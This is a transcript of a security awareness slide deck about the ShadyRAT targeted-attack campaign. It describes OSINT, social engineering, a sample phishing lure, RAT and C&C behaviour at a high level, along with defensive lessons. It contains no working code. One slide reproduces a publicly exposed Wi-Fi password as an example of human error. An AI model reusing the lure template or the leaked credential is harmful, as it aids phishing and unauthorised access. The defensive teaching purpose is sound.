Anatomy of a Targeted Attack against Mobile Device Management (MDM)
ShadyRAT: Anatomy of targeted attack
-
Upload
vladislav-radetskiy -
Category
Education
-
view
348 -
download
2
Transcript of ShadyRAT: Anatomy of targeted attack
ShadyRAT : Anatomy of targeted attack
Vladislav Radetskiy
About me…
Start in 2007 as Help Desk > System Administrator.
4 years experience in IT Outsourcing.
From 2011 working in BAKOTECH® Group.
Information security previously was my hobby, now it`s my job.
I am responsible for technical support of McAfee solutions.
https://radetskiy.wordpress.com/
http://www.slideshare.net/Glok17/
http://ua.linkedin.com/pub/vladislav-radetskiy/47/405/809
Vladislav Radetskiy
Technical Lead
C|EH applicant
Agenda
Terminology, today battleground of cybersecurity
ShadyRAT _ successful long-term complex cybercrime operation
How can we protect our clients from such advanced attacks?
Basics #1
Open-source intelligence – getting information from public sources.
Usual OSINT sources are Google, Facebook, LinkedIn etc.
Social Engineering – act of deception and manipulation of human to get profit: money, information disclosure, access to restricted area etc.
Famous: Frank William Abagnale (Catch Me If You Can), Kevin Mitnick.
OSINT during Cold War
“The decryption of a picture” from CIA library
3 month of analysisby Charles V. ReevesFrom Boston Edison
OSINT nowadays
Getting information about someone it`s not rocket science
Couple hours or evenless with tools
Name, DOB, job, family statusHabits, likes & dislikes, complex
Basics #2
Cyber-Attack – sequence of steps to compromise IT system
Advanced Persistent Threat (APT) – targeted, covered, long-term attack
Vulnerability – defect (a bug) in software (Microsoft, Adobe, Java)
Exploit – tool for take advantage of vulnerability (exploit-db.com)
Basics #3
Remote Access Tool (RAT) – tool for remote control of hacked system
Trojan / Backdoor / meterpreter etc
Command and Control (C&C) – servers on Internet which attackers used to control compromised systems and interact with persistent malware
Steganography – method of hiding data/code in to files (images)
Briefing about modern battleground
Cyber-criminals:
make attacks for information or money
can use prepared tools (regardless of their technical skills)
can chose anyone as their target
use OSINT and social engineering (to make perfect lure)
ShadyRAT
In 2011 McAfee Labs gain access to one C&C server.From server logs:
Duration of operation: 5+ years
Number of victims: 70+
Average duration persistence: ~ 9 months
Outcome: stolen data
Scope of targets: government, private, non-profit org…
ShadyRAT
Hi, Bob.Remember me?It`s me, John.We was together on last Yankees game.Listen, I can give you a great discount on ___________ .Thanks in advance
ShadyRATBob trustfully opened attached file, which use vulnerability to install RAT on Bob`s system.
ShadyRATRAT communicate with C&C server to get instructions
ShadyRAT
Attacker sends command:Sleep / Download / Upload …
RAT communicate with C&C server to get instructions
ShadyRATRAT transfer private data from Bob system to C&C server
Channel between RAT and C&C wasencrypted by steganographyIt`s like smokescreen for security staff
ShadyRAT
It`s a payday for attacker –collecting stolen data.Which can be sold for real money
ShadyRATThis can be repeat again & again3-9 monthsAnd Bob didn't noticed anything.Meanwhile his company go down..
ShadyRAT
1. Attackers chose company-victim
2. Gathering info about employees by OSINT
3. Use Social Engineering to compose fake emails with attached files
4. Victims receive fake email and .. open attached file (.xls)
5. Exploit from attached file used to deploy RAT
6. RAT establish outbound connections to C&C and transfer data
7. Commands to RAT hidden by steganography (HTML, images)
ShadyRAT
What the matter?!
Attackers used vulnerabilities in system along with social engineering
Attackers has ability to search and collect data for months
Operation was not so complex (technically), rather simple
RAT was undetected by months (9 - 28)
Outcome = big amount of data which can be sold by money or used later for blackmail
Any lessons learned after ShadyRAT? No!
July 2014 – January 2015 Meet CTB-Locker (Critrony)
Crypto ransomware > 350 – 700 $ for unencrypt data
Spreads by random! not targeted SPAM
Any lessons learned after ShadyRAT? No!
Meet CTB-Locker (Critrony)
How can we protect against APT
Components
How can we protect against APT
Conclusions
Cybercrime today it`s a way to make money > business
Almost anyone can take tools and try to brake in (Kali Linux, msf etc)
At the same time anyone can be chosen like a target
Be aware about targeted attacks, OSINT and Social Engineering
Sources
• Dmitri Alperovitch, Vice President of McAfee Threat Research
Revealed: Operation Shady RAT (August 2011)
• Bruce Schneier, computer security and privacy specialist
The State of Incident Response (Black Hat USA 2014)
• Steven Rambam, private investigator which use OSINT, Pallorium, Inc.
“Privacy is Dead - Get Over It” (2010)
“Privacy: A Postmortem” (2012)
“…Taking Anonymity” (2014)
Example of human vulnerabilities
Example of human vulnerabilities
2012 - Photos of Prince William Expose Royal Air Force Passwords
Example of human vulnerabilities
2014 - FIFA World Cup Brazilian Security Command Center Wi-Fi Pass
b5a2112014
Example of human vulnerabilities
2015 – French TV5Monde exposed pass during TV interview > hacked
And please don’t forget …
Sometimes (usually always) Google, Facebook, twitter and LinkedIn are the primarysources about private information about whole companies and their employees.
Information about predilections, habits and complexes of chosen people can berecovered by OSINT and used by attacker as pre-text for Social Engineering.
Thank you for your attention
Vladislav Radetskiy
radetskiy.wordpress.com